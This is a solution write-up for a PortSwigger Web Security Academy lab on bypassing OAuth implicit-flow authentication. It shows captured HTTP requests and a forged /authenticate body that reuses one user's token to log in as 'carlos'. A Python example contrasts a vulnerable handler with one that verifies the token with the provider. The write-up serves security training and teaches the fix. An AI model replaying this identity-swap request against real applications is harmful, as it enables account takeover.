PortSwigger: Authentication bypass via OAuth implicit flow
Solution
Open website: https://0a0a0065046c44028053036200da0031.web-security-academy.net/social-login
Log in via the social media OAuth option
https://0a0a0065046c44028053036200da0031.web-security-academy.net/social-login
---
GET /social-login HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /oauth-callback HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Get token for user: wiener
POST /authenticate HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/oauth-callback
Content-Type: application/json
Content-Length: 103
Origin: https://0a0a0065046c44028053036200da0031.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
{"email":"[email protected]","username":"wiener","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
Get user account details
GET /my-account?id=wiener HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=uVgW9UKss3CekuERNx48lOErcJPWcYVc
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Replace the email and username in the /authenticate request body (original, then modified):
{"email":"[email protected]","username":"wiener","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
{"email":"[email protected]","username":"carlos","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
---
POST /authenticate HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/oauth-callback
Content-Type: application/json
Content-Length: 103
Origin: https://0a0a0065046c44028053036200da0031.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
{"email":"[email protected]","username":"carlos","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
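The forged request above works because the client application's /authenticate endpoint takes the email and username from the request body at face value and never asks the OAuth provider which user the access token was actually issued to. The following Python is an added example written for this writeup, not the lab's own server code, and it stands in a simulated provider for the real /userinfo call: the hypothetical `authenticate_vulnerable` mirrors the lab's behaviour, while `authenticate_fixed` derives the identity from the provider's answer and rejects a body whose asserted email disagrees with it. The token value is the one captured above; the emails and the `PROVIDER_TOKENS` table are constructed placeholders.

```python
import json

# Constructed stand-in for the OAuth provider's userinfo endpoint: maps a
# bearer token to the identity the provider issued it for. The token string is
# the one seen in the lab traffic; the email addresses are placeholders.
PROVIDER_TOKENS = {
    "Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt": {
        "email": "wiener@example.invalid",
        "username": "wiener",
    },
}


def provider_userinfo(token):
    """Simulated provider call: returns the token's owner, or None if the
    provider does not recognise the token."""
    return PROVIDER_TOKENS.get(token)


def authenticate_vulnerable(raw_body):
    """Mirrors the defect exploited in the lab: the identity is taken from the
    client-supplied JSON, so the token is never tied to the claimed user.
    Returns the account a session would be issued for."""
    body = json.loads(raw_body)
    # Nothing here confirms that `token` belongs to `email`/`username`.
    return {"ok": True, "login_as": body["username"]}


def authenticate_fixed(raw_body):
    """Hardened handler: the provider, not the browser, says who the token
    belongs to. The client-supplied username is never used for the login."""
    body = json.loads(raw_body)
    token = body.get("token")
    if not token:
        return {"ok": False, "error": "missing token"}
    info = provider_userinfo(token)
    if info is None:
        return {"ok": False, "error": "token rejected by provider"}
    # A body whose asserted email disagrees with the provider's record is a
    # tampering signal worth logging; refusing it is safer than ignoring it.
    if body.get("email") != info["email"]:
        return {"ok": False, "error": "identity mismatch"}
    return {"ok": True, "login_as": info["username"]}


# Constructed request bodies: the forged one is the shape of the modified
# /authenticate request above, the genuine one is the unmodified shape.
TOKEN = "Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"
FORGED = json.dumps({"email": "carlos@example.invalid",
                     "username": "carlos", "token": TOKEN})
GENUINE = json.dumps({"email": "wiener@example.invalid",
                      "username": "wiener", "token": TOKEN})
BOGUS = json.dumps({"email": "carlos@example.invalid",
                    "username": "carlos", "token": "not-a-real-token"})

if __name__ == "__main__":
    print("vulnerable, forged body:", authenticate_vulnerable(FORGED))
    print("fixed, forged body:    ", authenticate_fixed(FORGED))
    print("fixed, bogus token:    ", authenticate_fixed(BOGUS))
    print("fixed, genuine body:   ", authenticate_fixed(GENUINE))
```

In a real deployment `provider_userinfo` is an HTTPS call to the provider with the token as a bearer credential, and the application should additionally confirm that the token was issued to its own client_id, since the implicit flow delivers the token to the browser and a token obtained for a different client can otherwise be replayed against this one.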
Logged in as user carlos
GET /my-account?id=carlos HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=cL2wiuAPoBl9p8xG4A1FZxqogUGbSBdt
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved